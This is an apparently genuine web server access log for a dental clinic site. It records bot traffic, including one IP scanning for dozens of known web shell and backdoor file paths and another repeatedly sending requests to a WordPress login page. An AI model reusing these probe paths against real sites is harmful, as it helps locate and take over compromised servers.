68.183.245.101 - - [15/Aug/2025:06:21:36 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
86.8.204.43 - - [15/Aug/2025:06:21:36 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
206.189.247.132 - - [15/Aug/2025:06:21:36 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
144.126.240.247 - - [15/Aug/2025:06:21:36 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
66.249.74.14 - - [15/Aug/2025:06:25:14 -0400] "GET /assets/img/All%20on%20four.webp HTTP/1.1" 301 266 "-" "Googlebot-Image/1.0"
69.171.230.10 - - [15/Aug/2025:06:26:54 -0400] "GET /teeth-aligners HTTP/1.1" 301 245 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
31.13.103.11 - - [15/Aug/2025:06:27:34 -0400] "GET /teeth-aligners HTTP/1.1" 301 245 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
139.99.23.122 - - [15/Aug/2025:06:32:25 -0400] "GET /wp-content/uploads/2017-------/09/wp-console.php HTTP/1.1" 301 283 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
139.99.23.122 - - [15/Aug/2025:06:32:25 -0400] "GET /wp-includes/js/crop/uword.php HTTP/1.1" 301 264 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
139.99.23.122 - - [15/Aug/2025:06:32:26 -0400] "GET /wp-content/themes/bltm/wp-login.php HTTP/1.1" 301 270 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
139.99.23.122 - - [15/Aug/2025:06:32:26 -0400] "GET /autoload_classmap.php HTTP/1.1" 301 256 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
139.99.23.122 - - [15/Aug/2025:06:32:27 -0400] "GET /wp-content/uploads/2014/07/olx.php HTTP/1.1" 301 269 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
139.99.23.122 - - [15/Aug/2025:06:32:28 -0400] "GET /wp-admin/css/colors/midnight/index.php HTTP/1.1" 301 273 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
139.99.23.122 - - [15/Aug/2025:06:32:28 -0400] "GET /wp-content/uploads/2020/wp-couldent.php.suspected HTTP/1.1" 301 284 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
139.99.23.122 - - [15/Aug/2025:06:32:29 -0400] "GET /wp-content/plugins/523453244/ninja.php HTTP/1.1" 301 273 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
139.99.23.122 - - [15/Aug/2025:06:32:29 -0400] "GET /wp-includes/js/imgareaselect/index.php HTTP/1.1" 301 273 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
139.99.23.122 - - [15/Aug/2025:06:32:29 -0400] "GET /wp-includes/PHPMailer/load.php HTTP/1.1" 301 265 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
139.99.23.122 - - [15/Aug/2025:06:32:30 -0400] "GET /wp-links.php HTTP/1.1" 301 247 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
139.99.23.122 - - [15/Aug/2025:06:32:30 -0400] "GET /wp-aa.php HTTP/1.1" 301 244 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
139.99.23.122 - - [15/Aug/2025:06:32:31 -0400] "GET /wp-content/themes/travelscape/json.php HTTP/1.1" 301 273 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
139.99.23.122 - - [15/Aug/2025:06:32:32 -0400] "GET /wp-content/themes/travel/issue.php HTTP/1.1" 301 269 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
139.99.23.122 - - [15/Aug/2025:06:32:32 -0400] "GET /about.php HTTP/1.1" 301 244 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
139.99.23.122 - - [15/Aug/2025:06:32:33 -0400] "GET /xx.php HTTP/1.1" 301 241 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
139.99.23.122 - - [15/Aug/2025:06:32:33 -0400] "GET /wp-content/themes/digital-download/new.php HTTP/1.1" 301 277 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
139.99.23.122 - - [15/Aug/2025:06:32:33 -0400] "GET /epinyins.php HTTP/1.1" 301 247 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
139.99.23.122 - - [15/Aug/2025:06:32:34 -0400] "GET /wp-admin/dropdown.php HTTP/1.1" 301 256 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
139.99.23.122 - - [15/Aug/2025:06:32:34 -0400] "GET /dropdown.php HTTP/1.1" 301 247 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
139.99.23.122 - - [15/Aug/2025:06:32:35 -0400] "GET /wp-admin/css/index.php HTTP/1.1" 301 257 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
139.99.23.122 - - [15/Aug/2025:06:32:35 -0400] "GET /wp-content/mah.php HTTP/1.1" 301 253 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
139.99.23.122 - - [15/Aug/2025:06:32:35 -0400] "GET /wp-content/item.php HTTP/1.1" 301 254 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
139.99.23.122 - - [15/Aug/2025:06:32:36 -0400] "GET /wp-content/plugins/shell/about.php HTTP/1.1" 301 269 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
139.99.23.122 - - [15/Aug/2025:06:32:36 -0400] "GET /wp-content/plugins/pwnd/pwnd.php HTTP/1.1" 301 267 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
139.99.23.122 - - [15/Aug/2025:06:32:36 -0400] "GET /wp-content/plugins/fix/up.php HTTP/1.1" 301 264 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
139.99.23.122 - - [15/Aug/2025:06:32:37 -0400] "GET /wp-content/plugins/ph-file-manager/wp-file.php HTTP/1.1" 301 281 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
139.99.23.122 - - [15/Aug/2025:06:32:37 -0400] "GET /wp-content/plugins/root-file-manager/wp-file.php HTTP/1.1" 301 283 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
139.99.23.122 - - [15/Aug/2025:06:32:37 -0400] "GET /wp-content/plugins/wp-help/mini.php HTTP/1.1" 301 270 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
139.99.23.122 - - [15/Aug/2025:06:32:38 -0400] "GET /wp-content/themes/travel/issue.php HTTP/1.1" 301 269 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
139.99.23.122 - - [15/Aug/2025:06:32:38 -0400] "GET /wp-content/themes/jaida/lang.php HTTP/1.1" 301 267 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
139.99.23.122 - - [15/Aug/2025:06:32:38 -0400] "GET /wp-l0gin.php HTTP/1.1" 301 247 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
139.99.23.122 - - [15/Aug/2025:06:32:39 -0400] "GET /ext.php HTTP/1.1" 301 242 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
139.99.23.122 - - [15/Aug/2025:06:32:39 -0400] "GET /wp-l0gin.php HTTP/1.1" 301 247 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
124.221.190.23 - - [15/Aug/2025:06:33:51 -0400] "GET / HTTP/1.1" 301 231 "-" "Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) MicroMessenger Weixin QQ AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/78.0.3904.62 XWEB/2692 MMWEBSDK/200901 Mobile Safari/537.36"
124.221.190.23 - - [15/Aug/2025:06:33:56 -0400] "GET / HTTP/1.1" 301 231 "-" "Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) MicroMessenger Weixin QQ AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/78.0.3904.62 XWEB/2692 MMWEBSDK/200901 Mobile Safari/537.36"
68.183.245.101 - - [15/Aug/2025:06:35:20 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
206.189.247.132 - - [15/Aug/2025:06:35:20 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
144.126.240.247 - - [15/Aug/2025:06:35:20 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
86.8.204.43 - - [15/Aug/2025:06:35:20 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
160.187.210.83 - - [15/Aug/2025:06:39:37 -0400] "GET /dental-tourism/teeth-implant/wp-login.php HTTP/1.1" 301 276 "www.orthosquare.in/dental-tourism/teeth-implant/wp-login.php" "Mozilla/5.0"
160.187.210.83 - - [15/Aug/2025:06:39:40 -0400] "POST /dental-tourism/teeth-implant/wp-login.php HTTP/1.1" 301 276 "www.orthosquare.in/dental-tourism/teeth-implant/wp-login.php" "Mozilla/5.0"
124.221.190.23 - - [15/Aug/2025:06:40:14 -0400] "GET / HTTP/1.1" 301 231 "-" "Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) MicroMessenger Weixin QQ AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/78.0.3904.62 XWEB/2692 MMWEBSDK/200901 Mobile Safari/537.36"
160.187.210.83 - - [15/Aug/2025:06:42:12 -0400] "GET /dental-tourism/teeth-implant/wp-login.php HTTP/1.1" 301 276 "www.orthosquare.in/dental-tourism/teeth-implant/wp-login.php" "Mozilla/5.0"
160.187.210.83 - - [15/Aug/2025:06:42:14 -0400] "POST /dental-tourism/teeth-implant/wp-login.php HTTP/1.1" 301 276 "www.orthosquare.in/dental-tourism/teeth-implant/wp-login.php" "Mozilla/5.0"